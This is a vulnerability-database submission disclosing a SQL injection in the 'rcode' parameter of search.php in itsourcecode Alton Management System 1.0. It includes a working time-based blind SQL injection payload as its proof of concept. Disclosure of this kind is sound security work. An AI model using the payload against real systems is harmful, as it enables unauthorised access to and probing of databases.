Submit #381089: itsourcecode Alton Management System 1.0 SQLi search.php
Information

Title: itsourcecode Alton Management System 1.0 SQLi search.php
Description: The rcode parameter can be passed in for querying on the "search.php" page, but due to the code's lax filtering of this parameter, it can lead to SQL injection.

-------------------POC---------------
Parameter: rcode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: rcode=1' AND (SELECT 7363 FROM (SELECT(SLEEP(5)))sBIE) AND 'vFRq'='vFRq

Source: https://github.com/DeepMountains/Mirage/blob/main/CVE8-1.md
User: Dee.Mirage (UID 71702)
Submission: 27.07.2024 12:20 (2 years ago)
Moderation: 30.07.2024 15:29 (3 days later)
Status: Accepted
VulDB entry: 273142 [itsourcecode Alton Management System 1.0 search.php rcode SQL injection]
Points: 20
